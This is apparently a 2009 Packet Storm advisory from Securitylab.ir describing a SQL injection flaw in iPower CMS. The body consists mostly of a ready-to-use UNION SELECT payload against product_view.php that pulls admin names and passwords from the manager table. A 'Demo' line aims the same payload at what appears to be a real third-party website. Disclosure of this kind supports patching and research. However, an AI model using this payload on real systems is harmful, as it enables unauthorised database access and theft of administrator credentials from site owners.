iPower CMS SQL Injection

2009-09-03T00:00:00
ID PACKETSTORM:80949
Type packetstorm
Reporter Securitylab Security Research
Modified 2009-09-03T00:00:00

Description

                                        
                                            `######################### Securitylab.ir ########################  
# Application Info:  
# Name: iPower CMS   
# Website: http://www.dingwei.cn  
#################################################################  
# Discoverd By: Securitylab.ir  
# Website: http://securitylab.ir  
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir  
#################################################################  
# Vulnerability Info:  
# Type: Sql injection  
# Risk: Medium  
#===========================================================  
# Exploit:  
# http://site.com/product_view.php?id=[] and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,name,13,14,15,password,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from manager--  
#   
# Demo:  
# http://www.bblbao.com/product_view.php?id=1019 and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,name,13,14,15,password,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from manager--  
#===========================================================  
#################################################################  
# Securitylab Security Research Team  
###################################################################  
  
  
  
`